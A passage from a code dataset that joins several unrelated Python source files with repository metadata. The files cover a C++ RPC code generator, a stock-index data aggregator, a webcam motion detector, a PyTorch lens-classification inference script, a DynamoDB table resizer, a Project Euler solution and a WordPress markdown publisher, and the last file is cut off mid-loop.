print("{", file = out_fd)
print(" this->comm = comm;", file = out_fd)
print(" this->object_id = object_id;", file = out_fd)
print("}", file = out_fd)
print(f"inline void {class_name}::activate(::pybx::Communicator* c, std::shared_ptr<ix::WebSocket> ws)", file = out_fd)
method_activate_code = f"""
{{
this->comm = c;
if (this->ws == nullptr) {{
this->ws = ws;
}} else {{
throw runtime_error("{class_name}::activate: not implemented for universal rop");
}}
}}
"""
print(method_activate_code, file = out_fd)
for m_def in interface_def.methods:
generate_interface_client_method_definition(class_name, interface_def.name, m_def, out_fd)
print(f"}} // end of namespace", file = out_fd)
def generate_interface_client_method_definition(rop_class_name, interface_class_name, m_def, out_fd):
# rop methods
method_impl_class_name = f"{interface_class_name}__{m_def.name}"
m_args_l = []
for t, n in zip(m_def.get_method_arg_types(), m_def.get_method_args()):
tt = t.get_cpp_code_name()
m_args_l.append(f"{tt} {n}")
m_args = ",".join(m_args_l)
m_ret_type = m_def.get_method_return_type().get_cpp_code_name()
disable_void_return = "//" if m_ret_type == "void" else ""
req_args_assignments = ";\n".join(["req.args." + x + "=" + x for x in m_def.get_method_args()])
print(f"inline {m_ret_type} {rop_class_name}::{m_def.name}({m_args})", file = out_fd)
print("{", file = out_fd)
rop_method_template = f"""
::pybx::Request<{method_impl_class_name}::args_t> req{{
.message_type = this->oneway ? ::pybx::message_type_t::METHOD_ONEWAY_CALL : ::pybx::message_type_t::METHOD_CALL,
.message_id = ::pybx::create_new_message_id(),
.method_signature = "{method_impl_class_name}",
.object_id = object_id,
.args = {method_impl_class_name}::args_t()
}};
{req_args_assignments};
{disable_void_return} {m_ret_type} ret;
ostringstream json_os;
to_json(json_os, req);
if (this->oneway) {{
comm->send_oneway(ws, json_os.str(), req.message_id);
}} else {{
auto res_s = comm->send_and_wait_for_response(ws, json_os.str(), req.message_id);
comm->check_response(res_s.first, res_s.second);
::pybx::Response<{method_impl_class_name}::return_t> res;
from_json(&res, res_s.second);
{disable_void_return} ret = res.retval.retval;
}}
{disable_void_return} return ret;
"""
print(rop_method_template, file = out_fd)
print("}", file = out_fd)
def generate_interface_server_method_impls(module_def, interface_def, out_fd):
cpp_namespace = get_cpp_namespace(interface_def.def_type.__module__)
print(f"namespace {cpp_namespace} {{", file = out_fd)
for m_def in interface_def.methods:
generate_interface_server_method_impl_definition(module_def, interface_def, m_def, out_fd)
print(f"}}", file = out_fd)
def generate_interface_server_method_impl_definition(module_def, interface_def, m_def, out_fd):
#ipdb.set_trace()
# activations code below is temp setup capabale to handle
# use-case of server callbacks only. More reigirous type support required
# to support all possible combinations like vector of rops, returns of rop
# etc
activations = []
if 1:
args_with_activation = []
for arg, arg_type in zip(m_def.get_method_args(), m_def.get_method_arg_types()):
if arg_type.is_rop_type():
activations.append(f"req.args.{arg}.activate(comm, ws);")
activations_code = "\n".join(activations)
m_args = ", ".join(["req.args." + x for x in m_def.get_method_args()])
m_ret_type = m_def.get_method_return_type().get_cpp_code_name()
disable_void_return = "//" if m_ret_type == "void" else ""
method_impl_do_call_tmpl = f"""
ostringstream res_os;
try {{
::pybx::Request<args_t> req;
from_json(&req, req_s);
{activations_code}
auto o = comm->find_object(req.object_id);
auto self = dynamic_pointer_cast<{interface_def.name}>(o);
if (self == nullptr) {{
throw runtime_error("dyn type mismatch");
}}
::pybx::Response<return_t> res;
res.message_id = ::pybx::create_new_message_id();
res.orig_message_id = req.message_id;
{disable_void_return} res.retval.retval =
self->{m_def.name}({m_args});
to_json(res_os, res);
}} catch (exception& e) {{
::pybx::ExceptionResponse eres;
eres.message_id = ::pybx::create_new_message_id();
eres.orig_message_id = ::pybx::get_message_id(req_s);
eres.remote_exception_text = e.what();
to_json(res_os, eres);
}}
*res_s = res_os.str();
"""
class_name = f"{interface_def.name}__{m_def.name}"
print(f"inline void {class_name}::do_call(const string& req_s, string* res_s, shared_ptr<ix::WebSocket> ws)", file = out_fd)
print("{", file = out_fd)
print(method_impl_do_call_tmpl, file = out_fd)
print("}", file = out_fd)
print(f"UNIQUE = ::pybx::RemoteMethods::register_method(\"{class_name}\", std::make_shared<{class_name}>());", file = out_fd)
def generate_cpp_file(module_def, out_fd, source_pybx_fn):
generate_prolog(source_pybx_fn, out_fd)
for enum_def in module_def.enums:
generate_enum_def(enum_def, out_fd)
for struct_name in module_def.struct_order:
struct_def = module_def.structs[struct_name]
generate_struct_def(struct_def, out_fd)
generate_interface_client_forward_declarations(module_def, out_fd)
for interface_def in module_def.interfaces:
generate_interface_client_declarations(interface_def, out_fd)
#ipdb.set_trace()
for interface_def in module_def.interfaces:
generate_interface_server_declarations(interface_def, out_fd)
for interface_def in module_def.interfaces:
generate_interface_client_definitions(interface_def, out_fd)
for interface_def in module_def.interfaces:
generate_interface_server_method_impls(module_def, interface_def, out_fd)
generate_epilog(out_fd)
| UTF-8 | Python | false | false | 17,470 | py | 45 | codegen_cpp.py | 32 | 0.607155 | 0.606754 | 0 | 377 | 45.339523 | 164 |
Hansen-chen/python_demo_program | 6,124,623,367,373 | f78ed3d01a66ba28f40e64c5ced3fe2672c54a69 | bf6e9f82f990057de2e8c621d5818584688400e4 | /venv/main.py | f4f6046d81c1420ce3873a7850289a210ba98559 | [] | no_license | https://github.com/Hansen-chen/python_demo_program | 4475843b1019a96ca1703331c61766797766fd34 | d0cf12a2cbaea0fbb3860e8e915d2d0bf273fad1 | refs/heads/master | "2020-07-08T17:55:09.875184" | "2019-08-22T07:31:41" | "2019-08-22T07:31:41" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
data_datetime = []
data_candlestick = []
try:
f = open('HKEX.HSI.txt', 'r')
#data = f.read()
#print(data)
separator=" "
for line in f:
columns = line.split(separator)
if len(columns) >= 1:
#print(columns[0]+" "+columns[1])
try:
data_datetime.append(dt.datetime.strptime(columns[0]+" "+columns[1], '%d/%m/%Y %H:%M:%S'))
data_candlestick.append(columns[9].rstrip())
except ValueError:
print("first line")
finally:
data_candlestick = np.array(data_candlestick)
data_candlestick = data_candlestick.astype(np.int)
#check hourly aggregate data
data_dictionary = dict(zip(data_datetime, data_candlestick))
df = pd.DataFrame({'time':data_datetime, 'type':data_candlestick})
df = df.set_index('time').groupby([pd.Grouper(freq='H')]).sum()
print(df.groupby(df.index.map(lambda t: t.hour)).describe())
#print(test)
if f:
f.close()
| UTF-8 | Python | false | false | 1,176 | py | 1 | main.py | 1 | 0.57483 | 0.568878 | 0 | 41 | 27.170732 | 106 |
Pranjal290/Web-Cam-Motion-Detector | 712,964,584,445 | 748aa3f1a2207881b36606aac03ce9a423f55fc9 | b1ac6f26f7a235703eed1eaf15ad72b619cff451 | /video_capture.py | 08257898566ad4f792cd6136bf695d3ee9b30c84 | [] | no_license | https://github.com/Pranjal290/Web-Cam-Motion-Detector | 801dde1398e166f8af1b4e8c17004df9dab2aa40 | b22e331b82864c7d17ea614d77189ec2101c5909 | refs/heads/master | "2020-11-27T21:51:24.731563" | "2019-12-22T18:54:11" | "2019-12-22T18:54:11" | 229,615,225 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2,time,pandas
from datetime import datetime
first_frame=None
video=cv2.VideoCapture(0)
status_list=[None,None]
time=[]
df=pandas.DataFrame(columns=['Start','End']) #using panda dataframe to store date and time of motion.
while True:
check,frame=video.read()
status=0
grey=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) #converting frame image to grey scaled version.
grey=cv2.GaussianBlur(grey,(21,21),0)
if first_frame is None:
first_frame=grey #storing the first frame.
continue
delta_frame=cv2.absdiff(first_frame,grey) #calculating the absolute difference between the initial frame and changed image.
tresh_delta=cv2.threshold(delta_frame,30,255,cv2.THRESH_BINARY)[1]
tresh_delta=cv2.dilate(tresh_delta,None,iterations=2)
(cnts,_)=cv2.findContours(tresh_delta.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
for contour in cnts:
if cv2.contourArea(contour)<10000: #comparing different contours.
continue
status=1
(x,y,w,h)=cv2.boundingRect(contour) #indicating changes withe a green rectangle.
cv2.rectangle(frame,(x,y),(x+w,y+w),(0,255,0),3)
status_list.append(status)
if status_list[-1]==1 and status_list[-2]==0: #storing the time of motion in a list.
time.append(datetime.now())
if status_list[-1]==0 and status_list[-2]==1:
time.append(datetime.now())
cv2.imshow("Delta Frame",delta_frame) #displaying the frames.
cv2.imshow("Threshhold Frame",tresh_delta)
cv2.imshow("Colour Frame",frame)
key =cv2.waitKey(1)
if key==ord('q'): #defining letter to close the window.
if status==1:
time.append(datetime.now())
break
for i in range(0,len(time),2):
df=df.append({"Start":time[i],"End":time[i+1]},ignore_index=True) #inserting values to data frame.
df.to_csv("Times.csv") #creating .csv executable file.
video.release()
cv2.destroyAllWindows
# PRESS 'q' ON KEYBOARD TO STOP THE PROGRAM | UTF-8 | Python | false | false | 2,076 | py | 3 | video_capture.py | 1 | 0.656069 | 0.627168 | 0 | 55 | 35.781818 | 129 |
abandonsea/msba_reid | 12,103,217,886,279 | 1459e19999eced757abe35aca1118546c8e59556 | 68f76af689d79d3e4a94354a4e644a878d8cfd40 | /engine/deprecated/v2/inference_save_res.py | cd2f824e553a79fdf65d5a684cb77b4b77ab87d6 | [] | no_license | https://github.com/abandonsea/msba_reid | b9d00660141f8e657ac090d1426d00a36d19fed9 | 831158247ed116e82a9ed285e25974abdfbf755b | refs/heads/master | "2023-07-15T20:01:15.274850" | "2020-01-07T02:28:09" | "2020-01-07T02:28:09" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # encoding: utf-8
"""
@author: liaoxingyu
@contact: sherlockliao01@gmail.com
"""
import logging
import torch
import numpy as np
import torch.nn.functional as F
from data.datasets.eval_reid import evaluate
from data.prefetcher import data_prefetcher
from utils.re_ranking import re_ranking
from utils.distance import low_memory_local_dist, local_dist
def inference(
cfg,
model,
test_dataloader,
num_query,
thetas
):
logger = logging.getLogger("reid_baseline.inference")
logger.info("Start inferencing")
model.eval()
feats, pids, camids = [], [], []
local_feats = []
test_prefetcher = data_prefetcher(test_dataloader)
batch = test_prefetcher.next()
while batch[0] is not None:
img, pid, camid = batch
with torch.no_grad():
feat = model(img)
if isinstance(feat, tuple):
feats.append(feat[0])
local_feats.append(feat[1])
else:
feats.append(feat)
pids.extend(pid.cpu().numpy())
camids.extend(np.asarray(camid))
batch = test_prefetcher.next()
feats = torch.cat(feats, dim=0)
if len(local_feats) > 0:
local_feats = torch.cat(local_feats, dim=0)
if cfg.TEST.NORM:
feats = F.normalize(feats, p=2, dim=1)
if len(local_feats) > 0:
local_feats = F.normalize(local_feats, p=2, dim=1)
# query
qf = feats[:num_query]
if len(local_feats) > 0:
lqf = local_feats[:num_query]
# gallery
gf = feats[num_query:]
if len(local_feats) > 0:
lgf = local_feats[num_query:]
if len(local_feats) > 0:
# calculate the local distance
lqf = lqf.permute(0, 2, 1)
lgf = lgf.permute(0, 2, 1)
#logger.info('Computing local_qg_distmat ...')
local_qg_distmat = low_memory_local_dist(lqf.cpu().numpy(), lgf.cpu().numpy(), aligned=True)
#logger.info('Computing local_qq_distmat ...')
local_qq_distmat = low_memory_local_dist(lqf.cpu().numpy(), lqf.cpu().numpy(), aligned=True)
#logger.info('Computing local_gg_distmat ...')
local_gg_distmat = low_memory_local_dist(lgf.cpu().numpy(), lgf.cpu().numpy(), aligned=True)
local_distmat = np.concatenate(
[np.concatenate([local_qq_distmat, local_qg_distmat], axis=1),
np.concatenate([local_qg_distmat.T, local_gg_distmat], axis=1)],
axis=0)
else:
local_distmat = None
use_rerank = True
if use_rerank:
#thetas = [0.4, 0.5, 0.9, 0.95, 1.0]
scores, indices, dist_mats = [], [], []
logger.info("use reranking")
for theta in thetas:
distmat = re_ranking(qf, gf, k1=6, k2=2, lambda_value=0.3, local_distmat=local_distmat, theta_value=theta)
score = distmat
index = np.argsort(score, axis=1) # from small to large
scores.append(score)
indices.append(index)
dist_mats.append(distmat)
return scores, indices, dist_mats
else:
logger.info("No reranking")
distmat = -torch.mm(qf, gf.t()).cpu().numpy()
score = distmat
index = np.argsort(score, axis=1) # from small to large
return score, index
def inference_flipped(
cfg,
model,
test_dataloader,
num_query,
thetas,
use_local_feature=True # 是否使用local特征
):
logger = logging.getLogger("reid_baseline.inference")
logger.info("Start inferencing")
model.eval()
g_feats, l_feats, gf_feats, lf_feats, pids, camids = [], [], [], [], [], []
val_prefetcher = data_prefetcher(test_dataloader)
batch = val_prefetcher.next()
while batch[0] is not None:
img, pid, camid = batch
with torch.no_grad():
g_feat, l_feat = model(img)
gf_feat, lf_feat = model(torch.flip(img, [3]))
g_feats.append(g_feat.data.cpu())
l_feats.append(l_feat.data.cpu())
gf_feats.append(gf_feat.data.cpu())
lf_feats.append(lf_feat.data.cpu())
pids.extend(pid.cpu().numpy())
camids.extend(np.asarray(camid))
batch = val_prefetcher.next()
g_feats = torch.cat(g_feats, dim=0)
l_feats = torch.cat(l_feats, dim=0)
gf_feats = torch.cat(gf_feats, dim=0)
lf_feats = torch.cat(lf_feats, dim=0)
if cfg.TEST.NORM:
g_feats = F.normalize(g_feats, p=2, dim=1)
gf_feats = F.normalize(gf_feats, p=2, dim=1)
# query
qf = g_feats[:num_query]
lqf = l_feats[:num_query]
qff = gf_feats[:num_query]
lqff = lf_feats[:num_query]
q_pids = np.asarray(pids[:num_query])
q_camids = np.asarray(camids[:num_query])
# gallery
gf = g_feats[num_query:]
lgf = l_feats[num_query:]
gff = gf_feats[num_query:]
lgff = lf_feats[num_query:]
g_pids = np.asarray(pids[num_query:])
g_camids = np.asarray(camids[num_query:])
# calculate the global distance
scores, indices, dist_mats = [], [], []
#use_local_feature = True
if use_local_feature:
logger.info("--------computing local features ...--------")
lqf = lqf.permute(0, 2, 1)
lgf = lgf.permute(0, 2, 1)
local_distmat = low_memory_local_dist(lqf.numpy(), lgf.numpy(), aligned=True)
local_qq_distmat = low_memory_local_dist(lqf.numpy(), lqf.numpy(), aligned=True)
local_gg_distmat = low_memory_local_dist(lgf.numpy(), lgf.numpy(), aligned=True)
local_dist = np.concatenate(
[np.concatenate([local_qq_distmat, local_distmat], axis=1),
np.concatenate([local_distmat.T, local_gg_distmat], axis=1)],
axis=0)
logger.info("--------computing flipped local features ...--------")
lqff = lqff.permute(0, 2, 1)
lgff = lgff.permute(0, 2, 1)
local_distmat = low_memory_local_dist(lqff.numpy(), lgff.numpy(), aligned=True)
local_qq_distmat = low_memory_local_dist(lqff.numpy(), lqff.numpy(), aligned=True)
local_gg_distmat = low_memory_local_dist(lgff.numpy(), lgff.numpy(), aligned=True)
local_dist_flip = np.concatenate(
[np.concatenate([local_qq_distmat, local_distmat], axis=1),
np.concatenate([local_distmat.T, local_gg_distmat], axis=1)],
axis=0)
else:
local_dist = None
local_dist_flip = None
logger.info("use reranking")
for theta in thetas:
distmat = re_ranking(qf, gf, k1=6, k2=2, lambda_value=0.3, local_distmat=local_dist, theta_value=theta,
only_local=False)
distmat_flip = re_ranking(qff, gff, k1=6, k2=2, lambda_value=0.3, local_distmat=local_dist_flip, theta_value=theta,
only_local=False)
# 合并距离
distmat = (distmat + distmat_flip) / 2
score = distmat
index = np.argsort(score, axis=1) # from small to large
scores.append(score)
indices.append(index)
dist_mats.append(distmat)
return scores, indices, dist_mats
| UTF-8 | Python | false | false | 7,072 | py | 93 | inference_save_res.py | 89 | 0.585791 | 0.573454 | 0 | 210 | 32.580952 | 123 |
0AdityaD/competitive | 5,231,270,201,215 | a0de5dbc78d4888f9483265ed57136360ba28a7d | 7e2b5fa590b34bb589f97242b1e139219ab6c97b | /kattis/perfect_powers.py | aa2166e84902b4b0b927c4e09ef11a64d2eb43cb | [] | no_license | https://github.com/0AdityaD/competitive | a7195c8096fc443d2aa506910da472b8b0a21226 | 497345e0cdad058d57bb84dc96dfc1856eae5cbe | refs/heads/master | "2020-03-01T21:40:08.350769" | "2020-02-26T08:54:37" | "2020-02-26T08:54:37" | 83,923,869 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import defaultdict
from random import randint
def gcd2(a, b):
a, b = max(a, b), min(a, b)
if b == 0:
return a
return gcd2(b, a % b)
def gcd(ls):
if len(ls) == 0:
return 1
ans = ls[0]
for elt in ls[1:]:
ans = gcd2(elt, ans)
return ans
def is_prime(n, primes):
for prime in primes:
if n % prime == 0:
return False
elif prime * prime > n:
return True
return True
def gen_primes():
primes = [2, 3]
for i in range(5, 100001, 2):
if is_prime(i, primes):
primes.append(i)
return primes
def factor(x, primes):
factorization = defaultdict(int)
for prime in primes:
if prime * prime > x:
break
while x % prime == 0:
x //= prime
factorization[prime] += 1
if x > 1:
factorization[x] += 1
return factorization
def solve(x, primes):
f = factor(abs(x), primes)
result = gcd(list(f.values()))
if x < 0:
while result % 2 == 0:
result //= 2
print(result)
def main():
primes = gen_primes()
x = int(input())
while x != 0:
solve(x, primes)
x = int(input())
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 1,291 | py | 773 | perfect_powers.py | 757 | 0.497289 | 0.4756 | 0 | 69 | 17.710145 | 37 |
yuyasugano/dynamodb-ohlcv-crypto | 13,357,348,303,150 | 6a7100eaa504f3af78074814e23425941039c281 | f3ac44c5c376a3f7e1b6d384c26916d4e9c43dde | /dynamodb-sam/resizer.py | f41f00cc69fc9ea3c2f369b10fa4d9419ea392a6 | [
"MIT"
] | permissive | https://github.com/yuyasugano/dynamodb-ohlcv-crypto | ddbfef21b220a65a923a3ea766c54ab0a4d07c7f | c7bef03bccb43baaf306c9d1f2a32c6fbccc57fa | refs/heads/master | "2022-12-01T04:17:02.025759" | "2020-08-12T02:27:03" | "2020-08-12T02:27:03" | 286,716,162 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import boto3
import datetime
region = os.environ.get('AWS_DEFAULT_REGION', 'ap-northeast-1')
dynamodb = boto3.client('dynamodb', region_name=region)
class DailyResize(object):
FIRST_DAY_RCU, FIRST_DAY_WCU = 3, 3
OLD_DAY_RCU, OLD_DAY_WCU = 1, 1
def __init__(self, table_prefix):
self.table_prefix = table_prefix
def create_new(self):
# create new table
today = datetime.date.today()
tomorrow = datetime.date.today() + datetime.timedelta(1)
new_table_name = "{}_{}".format(self.table_prefix, self._format_date(tomorrow))
dynamodb.create_table(
TableName = new_table_name,
KeySchema = [
{
'AttributeName': 'name',
'KeyType': 'HASH' # Partition Key
},
{
'AttributeName': 'datetime',
'KeyType': 'RANGE' # Sort Key
}
],
AttributeDefinitions = [
{
'AttributeName': 'name',
'AttributeType': 'S',
},
{
'AttributeName': 'datetime',
'AttributeType': 'S'
}
],
ProvisionedThroughput = {
'ReadCapacityUnits': self.FIRST_DAY_RCU,
'WriteCapacityUnits': self.FIRST_DAY_WCU
},
)
print("Table created with name {}".format(new_table_name))
return new_table_name
def resize_old(self):
# update older table
yesterday = datetime.date.today() - datetime.timedelta(1)
old_table_name = "{}_{}".format(self.table_prefix, self._format_date(yesterday))
self._update_table(old_table_name, self.OLD_DAY_RCU, self.OLD_DAY_WCU)
return 'OK'
def delete_old(self):
# delete older table
weekago = datetime.date.today() - datetime.timedelta(7)
old_table_name = "{}_{}".format(self.table_prefix, self._format_date(weekago))
self._delete_table(old_table_name)
return 'OK'
def _update_table(self, table_name, RCU, WCU):
""" Update RCU/WCU of the given table (if exists) """
print("Updating table with name {}".format(table_name))
try:
dynamodb.update_table(
TableName = table_name,
ProvidionedThroughput = {
'ReadCapacityUnits': RCU,
'WriteCapacityUnits': WCU,
},
)
except dynamodb.exceptions.ResourceNotFoundException as e:
print("DynamoDB Table {} not found".format(table_name))
def _delete_table(self, table_name):
""" Delete the given table (if exists) """
print("Deleting table with name {}".format(table_name))
try:
dynamodb.delete_table(TableName = table_name)
except dynamodb.exceptions.ResourceInUseException as e:
print("DynamoDB Table {} in use".format(table_name))
except dynamodb.exceptions.ResourceNotFoundException as e:
print("DynamoDB Table {} not found".format(table_name))
@staticmethod
def _format_date(d):
return d.strftime("%Y-%m-%d")
| UTF-8 | Python | false | false | 3,276 | py | 7 | resizer.py | 4 | 0.539377 | 0.536325 | 0 | 94 | 33.840426 | 88 |
piohhmy/euler | 16,870,631,575,771 | 99b98d97fbd91616fb282d1e3d0891bb245f7c95 | 7af1b10e4389a4be5f2f22f3178fff2503280929 | /p022.py | 0861e4c3a41fafc703117affd664275c7bc87c1d | [
"MIT"
] | permissive | https://github.com/piohhmy/euler | 559f15fa9f7f5c644b65b43674646e0f520fd46e | f1b548a28a503fb8a0878fda75c32e1dcfb33243 | refs/heads/master | "2021-01-02T08:39:00.142314" | "2016-01-22T15:32:46" | "2016-01-22T15:32:46" | 11,699,388 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """ Using names.txt (right click and 'Save Link/Target As...'), a 46K text
file containing over five-thousand first names, begin by sorting it into
alphabetical order. Then working out the alphabetical value for each name,
multiply this value by its alphabetical position in the list to obtain a
name score.
For example, when the list is sorted into alphabetical order, COLIN, which is
worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN
would obtain a score of 938 x 53 = 49714.
What is the total of all the name scores in the file? """
def alphabetical_value(name):
return sum([ord(letter) - 64 for letter in name])
def solve_p22():
with open('p022_names.txt', 'r') as namefile:
names = namefile.readline()
namelist = sorted([name.strip('"') for name in names.split(",")])
total = 0
for i, name in enumerate(namelist):
total += (i+1) * alphabetical_value(name)
return total
if __name__ == '__main__':
print(solve_p22()) | UTF-8 | Python | false | false | 996 | py | 49 | p022.py | 48 | 0.680723 | 0.644578 | 0 | 29 | 33.37931 | 77 |
POFK/LensFinder | 876,173,363,298 | d1bfaaf055bf0bacc7960555267588a2eb2764d0 | bcb13b92bf0a1ec85f40c99e9ffa49654bd3a3a5 | /lens/eval.py | 9c9d1732120322d6eee74b0463f21bd45eeec20b | [
"MIT"
] | permissive | https://github.com/POFK/LensFinder | 81fc2c67366396240f6f6d4c2c3ba02fb74a8539 | 56a8cb3f99a68b5922e0a8c76e1cee27ef75a09e | refs/heads/master | "2020-06-10T15:53:42.381966" | "2019-08-23T03:20:16" | "2019-08-23T03:20:16" | 193,665,698 | 0 | 0 | MIT | false | "2019-08-22T04:11:29" | "2019-06-25T08:21:14" | "2019-08-21T10:11:49" | "2019-08-22T04:11:28" | 10,626 | 0 | 0 | 0 | Jupyter Notebook | false | false | #!/usr/bin/env python
# coding=utf-8
import os
import numpy as np
import torch
import h5py
import tqdm
import glob
from torch.utils.data import Dataset, DataLoader, ConcatDataset
from torchvision import transforms
from main import *
random_crop = args.crop_range
#name = 'area1_hdf5_2'
name = 'area2_hdf5'
model_path = '/data/dell5/userdir/maotx/Lens/model/lens_049_40.cpt'
BaseDir = '/data/inspur_disk03/userdir/wangcx/BASS_stack/area2/'+name
OutDir = '/data/dell5/userdir/maotx/Lens/result/{}_{}'.format(
name, model_path.split('/')[-1][:-4])
check_dir(OutDir)
fps = glob.glob(BaseDir + '/*.hdf5')
fps = [i.replace(BaseDir + '/', '') for i in fps]
class HdfDataset(Dataset):
"""My dataset."""
def __init__(self, root, path, transform=None):
"""
Args:
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.root = root
self.path = path
self.transform = transform
with h5py.File(os.path.join(root, path), 'r') as fp:
self.keys = list(fp.keys())
def _init_fn(self, num):
self.fp = h5py.File(os.path.join(self.root, self.path), 'r')
def __len__(self):
return len(self.keys)
def __getitem__(self, idx):
image = self.fp[self.keys[idx]]
g = self._center(image['g'][...].reshape(-1))
r = self._center(image['r'][...].reshape(-1))
z = self._center(image['z'][...].reshape(-1))
image = np.c_[g, r, z].reshape(101, 101, 3)
key = self.keys[idx]
if self.transform:
image = self.transform(image)
return {'image': image, 'key': key, 'path': self.path}
def _center(self, x):
mean = x.mean()
std = x.std()
return (x - mean) / std
class HdfConcatDataset(ConcatDataset):
def _init_fn(self, num):
for ds in self.datasets:
ds._init_fn(num)
class ToTensor(object):
def __call__(self, image):
image = image.transpose((2, 0, 1))
image = np.clip(image, -100, 100)
image = torch.from_numpy(image)
return image
class Crop(object):
"""Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, image):
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = (h - new_h)//2
left = (w - new_w)//2
image = image[top:top + new_h, left:left + new_w]
return image
def eval(BaseDir, fps=[], OutDir=OutDir, model_path=model_path):
preprocess = transforms.Compose([Crop(random_crop), ToTensor()])
model, _ = get_model()
model = torch.nn.DataParallel(model)
_ = torch.load(model_path, map_location='cpu')
model, epoch = load(model_path, model)
print('loading {}'.format(model_path), epoch)
model.eval()
for fp in tqdm.tqdm(fps):
BASS_ds = HdfDataset(root=BaseDir, path=fp, transform=preprocess)
BASS_dl = DataLoader(BASS_ds, batch_size=args.batch_size,
num_workers=4, worker_init_fn=BASS_ds._init_fn)
PROB = []
with torch.no_grad():
for data_step in BASS_dl:
key = data_step['key']
prob = torch.sigmoid(model(data_step['image'])).numpy()
PROB.append(zip(key, prob))
wpath = os.path.join(OutDir, fp.replace('.hdf5','.txt'))
with open(wpath, 'w') as FP:
for result in PROB:
for key, P_value in result:
temp = "{}\t{}\t{}\n".format(key, P_value[0], P_value[1])
FP.writelines(temp)
if __name__ == "__main__":
eval(BaseDir, fps=fps, OutDir=OutDir, model_path=model_path)
| UTF-8 | Python | false | false | 4,088 | py | 26 | eval.py | 14 | 0.566781 | 0.554795 | 0 | 131 | 30.198473 | 77 |
psyvirgin/markpress | 12,807,592,504,550 | 8d46bd036473cae172d283e8f67f5de1d439217c | 141beebb8650263669d03f1cca1ca1e1c3d4bd64 | /lib/wordpress.py | 57e257324aafc06e34fa9afd363cfe2b34dde63b | [
"MIT"
] | permissive | https://github.com/psyvirgin/markpress | c3eddb8370e7e326e7d01d85f05aff84bcabdc07 | e5f12795b1e82e2223f33953cc9694690c96a959 | refs/heads/master | "2020-03-19T01:05:38.859194" | "2016-04-02T13:56:21" | "2016-04-02T13:56:21" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/python
#----------------------------------------------------------------------
#
# wordpress.py - wordpress
#
# NOTE:
# for more information, please see the readme file
#
#----------------------------------------------------------------------
import sys, time, os
import markdown3
import blogpost
#----------------------------------------------------------------------
# global definition
#----------------------------------------------------------------------
def die (message):
sys.stderr.write('%s\n'%message)
sys.stderr.flush()
sys.exit(1)
#----------------------------------------------------------------------
# configure
#----------------------------------------------------------------------
class configure (object):
def __init__ (self, home = '.'):
self._dirhome = os.path.abspath(home)
self._ininame = self.path('wordpress.ini')
self._inipath = ''
self._config = {}
self._posts = []
self._names = []
self._wordpress = {}
self._update_site()
self._update_posts()
def path (self, name):
return os.path.abspath(os.path.join(self._dirhome, name))
def die (self, message):
sys.stderr.write('%s\n'%message)
sys.stderr.flush()
sys.exit(1)
return 0
def _read_content (self, name):
content = open(name, 'rb').read()
if content[:3] == '\xef\xbb\xbf':
content = content[3:]
return content
def _update_site (self):
if not os.path.exists(self._ininame):
self.die('missing %s\n'%self._ininame)
import StringIO
import ConfigParser
sio = StringIO.StringIO(self._read_content(self._ininame))
cp = ConfigParser.ConfigParser()
cp.readfp(sio)
for sect in cp.sections():
self._config[sect] = {}
for key, val in cp.items(sect):
self._config[sect][key] = val.strip('\r\n\t ')
class Object (object): pass
self._wordpress = Object()
self._wordpress.url = self.config('default', 'url')
self._wordpress.username = self.config('default', 'username')
self._wordpress.password = self.config('default', 'password')
if not self._wordpress.url:
self.die('can not find url in %s\n'%self._ininame)
if not self._wordpress.username:
self.die('can not find username in %s\n'%self._ininame)
return 0
def config (self, sect, key, default = None):
if not sect in self._config:
return default
val = self._config[sect].get(key, default)
return val
def _update_posts (self):
self._posts = []
self._names = {}
for fn in os.listdir(self.path('doc')):
ext = os.path.splitext(fn)[-1].lower()
if ext != '.md':
continue
class Object (object): pass
main = os.path.splitext(fn)[0]
post = Object()
post.name = fn
post.filename = {}
post.filename['md'] = self.path('doc/' + fn)
post.filename['html'] = self.path('data/' + main + '.html')
post.filename['meta'] = self.path('data/' + main + '.blogpost')
self._update_info(post)
self._posts.append(post)
self._names[fn] = post
return 0
def _update_info (self, post):
time_md = os.stat(post.filename['md']).st_ctime
time_html = -1
time_meta = -1
post.modified = False
if os.path.exists(post.filename['html']):
time_html = os.stat(post.filename['html']).st_ctime
if time_html < time_md: post.modified = True
else:
post.modified = True
if os.path.exists(post.filename['meta']):
time_meta = os.stat(post.filename['meta']).st_ctime
if time_meta < time_md: post.modified = True
else:
post.modified = True
post.title = ''
post.categories = []
post.tags = []
return 0
def __getitem__ (self, index):
if type(index) in (type(''), type(u'')):
return self._names.get(index)
return self._posts[index]
def __contains__ (self, index):
if type(index) in (type(''), type(u'')):
return (index in self._names)
return (index >= 0) and (index < len(self._posts))
def __len__ (self):
return len(self._posts)
def __repr__ (self):
return repr([ p.name for p in self._posts ])
def markdown (self, post):
content = open(post.filename['md'], 'rb').read()
if content[:3] == '\xef\xbb\xbf':
content = content[3:]
content = content.decode('utf-8')
extras = ['metadata', 'fenced-code-blocks']
extras.append('cuddled-lists')
extras.append('tables')
extras.append('footnotes')
post.html = markdown3.markdown(content, extras = extras)
#print post.html.metadata
post.metadata = post.html.metadata and post.html.metadata or {}
post.title = post.metadata.get('title', '').strip('\r\n\t ')
categories = post.metadata.get('categories', '').split(',')
tags = post.metadata.get('tags', '').split(',')
post.categories = []
post.tags = []
for n in [ n.strip() for n in categories ]:
